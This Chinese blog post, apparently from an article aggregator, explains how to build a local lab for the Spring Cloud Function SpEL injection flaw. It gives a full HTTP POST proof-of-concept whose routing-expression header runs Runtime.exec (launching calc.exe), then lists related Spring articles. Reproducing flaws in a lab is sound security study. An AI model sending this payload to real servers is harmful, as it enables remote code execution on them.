Spring-Cloud-Function-Spel 漏洞环境搭建
1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
漏洞验证:
到此这篇关于Spring-Cloud-Function-Spel 漏洞复现的文章就介绍到这了,更多相关Spring-Cloud-Function-Spel 漏洞内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!
相关推荐
-
Spring-Cloud-Function-Spel 漏洞环境搭建
1.漏洞环境搭建 由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了.但是这次vulhub好像不太及时.对于自己只能自己搭建环境了. 找了许久,终于在唐大佬的github中找到几乎一键的方法. 参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel这里放原始链接以表示尊重. 无法上github的话,私信我. 搭建方法很简单,先安装maven jdk 等.大佬是jdk17 我本地下载最新版本18
-
spring cloud alibaba Nacos 注册中心搭建过程详解
这篇文章主要介绍了spring cloud alibaba Nacos 注册中心搭建过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 nacos下载地址 什么是 Nacos? nacos主要起到俩个作用一个是注册中心,另外一个是配置中心. 下面图 是nacos的功能结构图 运行环境 JDK 1.8+: Maven 3.2.x+: 下载 你可以通过源码和发行包两种方式来获取 Nacos. nacos发行包下载地址 选择版本解压 unzip
-
Spring Cloud之配置中心的搭建
Spring Cloud是现在流行的分布式服务框架,它提供了很多有用的组件.比如:配置中心.Eureka服务发现.消息总线.熔断机制等. 配置中心在Spring Cloud的众多组件中是比较基础的,它提供了配置文件的统一管理,可以很轻松的切换不通的环境. 它的具体结构如下: 存储配置文件的文件系统(通常使用git) 配置中心服务端(从文件系统获取最新的配置文件,为客户端提供配置信息) 配置客户端(从配置中心获取配置信息) Spring Cloud是建立在Spring Boot基础上的,Sprin
-
SpringCloud Function SpEL注入漏洞分析及环境搭建
目录 SpringCloud Function 介绍 漏洞环境搭建 SpEL注入 漏洞复现 原理分析 补丁分析 引用 SpringCloud Function 介绍 SpringCloud 是一套分布式系统的解决方案,常见的还有阿里巴巴的Dubbo,Fass(Function As A Service )的底层实现就是函数式编程,在视频转码.音视频转换.数据仓库ETL等与状态相关度低的领域运用的比较多.开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可. SpringCloud F
-
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)的过程解析
目录 1.漏洞描述 2.影响版本 3.漏洞环境搭建 4.漏洞复现 5.修复方案 1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单.有效.统一的 API 路由管理方式. Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway
-
Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)
目录 漏洞描述 环境搭建 漏洞复现 声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任. 漏洞描述 使用Spring Cloud Gateway的应用程序在Actuator端点启用.公开和不安全的情况下容易受到代码注入的攻击.攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求. 当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令. 影响范围 Spring Cloud Gateway <
-
利用Spring Cloud Config结合Bus实现分布式配置中心的步骤
概述 假设现在有个需求: 我们的应用部署在10台机器上,当我们调整完某个配置参数时,无需重启机器,10台机器自动能获取到最新的配置. 如何来实现呢?有很多种,比如: 1.将配置放置到一个数据库里面,应用每次读取配置都是直接从DB读取.这样的话,我们只需要做一个DB变更,把最新的配置信息更新到数据库即可.这样无论多少台应用,由于都从同一个DB获取配置信息,自然都能拿到最新的配置. 2.每台机器提供一个更新配置信息的updateConfig接口,当需要修改配置时,挨个调用服务器的updateConf
-
使用Spring Expression Language (SpEL)全面解析表达式
目录 Spring Expression Language (SpEL) 1.环境准备 2.SpEL示例应用 3.小结 Spring表达式语言SpEL SpEL:字面量 SpEL:引用 Bean.属性和方法 SpEL支持的运算符号 示例-基于xml的方式 Spring Expression Language (SpEL) 是强大的表达式语言,支持查询.操作运行时对象图,以及解析逻辑.算术表达式.SpEL可以独立使用,无论你是否使用Spring框架. 本文尝试通过多个示例使用SpEL,探索其强大能
-
spring cloud升级到spring boot 2.x/Finchley.RELEASE遇到的坑
spring boot2.x已经出来好一阵了,而且spring cloud 的最新Release版本Finchley.RELEASE,默认集成的就是spring boot 2.x,这几天将一个旧项目尝试着从低版本升级到 2.x,踩坑无数,记录一下: 显著变化: 与 Spring Boot 2.0.x 兼容 不支持 Spring Boot 1.5.x 最低要求 Java 8 新增 Spring Cloud Function 和 Spring Cloud Gateway 一.gradle的问题 sp
-
Spring Cloud Stream微服务消息框架原理及实例解析
随着近些年微服务在国内的盛行,消息驱动被提到的越来越多.主要原因是系统被拆分成多个模块后,一个业务往往需要在多个服务间相互调用,不管是采用HTTP还是RPC都是同步的,不可避免快等慢的情况发生,系统性能上很容易遇到瓶颈.在这样的背景下,将业务中实时性要求不是特别高且非主干的部分放到消息队列中是很好的选择,达到了异步解耦的效果. 目前消息队列有很多优秀的中间件,目前使用较多的主要有 RabbitMQ,Kafka,RocketMQ 等,这些中间件各有优势,有的对 AMQP(应用层标准高级消息队列协议
随机推荐
- jQuery左右滚动支持图片放大缩略图图片轮播代码分享
- js下为表格内部动态添加行的代码
- 详解Centos7中Nginx开机自启动的解决办法
- jsp搜索引擎
- asp 生成任意英文+数字位数长度的随机码函数
- 利用ASP发送和接收XML数据的处理方法
- 详解ASP.NET Core 网站在Docker中运行
- mysql 精简过程(删除一些文件)
- javascript 显示全局变量与隐式全局变量的区别
- DefiniteUrl asp将相对地址转换为绝对地址的代码
- MySQL5.5.27安装图文教程
- JS中的异常处理方法分享
- Java实现FTP文件与文件夹的上传和下载
- python分析作业提交情况
- python+tkinter编写电脑桌面放大镜程序实例代码
- vue2中使用less简易教程
- js中let能否完全替代IIFE
- pandas DataFrame 交集并集补集的实现
- springboot启动时运行代码详解
- 在Django model中设置多个字段联合唯一约束的实例